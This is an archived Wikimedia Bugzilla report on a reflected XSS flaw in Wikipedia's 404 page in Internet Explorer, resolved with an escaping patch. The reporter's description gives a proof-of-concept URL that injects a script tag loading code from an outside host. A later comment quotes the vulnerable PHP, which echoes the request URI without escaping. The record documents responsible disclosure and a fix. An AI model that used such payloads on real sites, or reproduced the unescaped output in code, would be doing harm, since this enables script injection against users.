Last modified: 2013-05-20 19:21:06 UTC

Wikimedia Bugzilla is closed!

Wikimedia migrated from Bugzilla to Phabricator. Bug reports are handled in Wikimedia Phabricator.
This static website is read-only and for historical purposes. It is not possible to log in and except for displaying bug reports and their history, links might be broken. See T50380, the corresponding Phabricator task for complete and up-to-date bug report information.

Bug 48380 - XSS vulnerability in 404 error page in IE


Summary:	XSS vulnerability in 404 error page in IE

Status:	RESOLVED FIXED

Product:	Wikimedia
Classification:	Unclassified
Component:	General/Unknown (Other open bugs)
Version:	unspecified
Hardware:	All All

Importance:	Unprioritized normal (vote)
Target Milestone:	---
Assigned To:	Chris Steipp

URL:
Whiteboard:
Keywords:

Depends on:
Blocks:
	Show dependency tree / graph

Reported:	2013-05-12 15:31 UTC by Masato Kinugawa
Modified:	2013-05-20 19:21 UTC (History)
CC List:	7 users (show)

See Also:
Web browser:	Internet Explorer
Mobile Platform:	---
Assignee Huggle Beta Tester:	---

Attachments
Escape $matches[1] before output (1.14 KB, patch) 2013-05-13 19:27 UTC, Chris Steipp	Details
Add an attachment (proposed patch, testcase, etc.)

Description Masato Kinugawa 2013-05-12 15:31:10 UTC

It works on IE.
PoC is: http://en.wikipedia.org/w/a?"src=//l0.cm></script><script/id="

Comment 1 Andre Klapper 2013-05-13 11:23:10 UTC

Hi Masato, thanks a lot for taking the time to report this!

Confirming for Internet Explorer only.
No popup for Firefox 18, Opera 12.14 and Google Chrome 26 on Fedora Linux.
No popup for Firefox 18, Opera 12.12 on Windows XP SP3.

When I try the given URL with Microsoft Internet Explorer 8 on Microsoft Windows XP SP3, I get the "Error 404 - File not found" page, but also a popup saying:

     Message from webpage
     1

The 404 page says:

     Error
     404 - File not found
     http://en.wikipedia.org/w/a?"src=//l0.cm></script><script/id="
     We could not find the above page on our servers.
     To check for "a?"src=//l0.cm>

Note the truncated URL. All other tested browsers show the following (full plus also correctly URL-encoded) output on the 404 page:

     Error
     404 - File not found
     http://en.wikipedia.org/w/a?"src=//l0.cm></script><script/id="
     We could not find the above page on our servers.
     To check for "a?%22src=//l0.cm%3E%3C/script%3E%3Cscript/id=%22"
     on Wikipedia, see: //en.wikipedia.org/wiki/a?
     %22src=//l0.cm%3E%3C/script%3E%3Cscript/id=%22
     Alternatively, you can visit the Main Page or read 
     more information about this type of error.
     A project of the Wikimedia Foundation

Comment 2 Chris Steipp 2013-05-13 19:21:00 UTC

Looks like it's coming from 404.php:

if( preg_match( "|(%2f)|i", $loc, $matches ) ||
    preg_match( "|^/upload/(.*)|i",$loc, $matches ) || preg_match("|^/style/(.*)|i",$loc, $matches ) ||
    preg_match( "|^/wiki/(.*)|i",$loc, $matches ) || preg_match("|^/w/(.*)|i",$loc, $matches ) ||
    preg_match( "|^/extensions/(.*)|i",$loc, $matches ) ) {
	$title = $matches[1];
	$details = "<p style=\"font-weight: bold;\">To check for \"$title\" on Wikipedia, see: 
                <a href=\"//en.wikipedia.org/wiki/$title\" title=\"Wikipedia:$title\">
                //en.wikipedia.org/wiki/$title</a></p>";


Since $loc comes directly from $_SERVER["REQUEST_URI"] without escaping, $matches[1] needs to be escaped.

Comment 3 Chris Steipp 2013-05-13 19:27:48 UTC

Created attachment 12303 [details]
Escape $matches[1] before output

Comment 4 Sam Reed (reedy) 2013-05-20 19:07:19 UTC

https://gerrit.wikimedia.org/r/#/c/64617/

Wikimedia Bugzilla is closed!

Search

Personal tools

Navigation

Links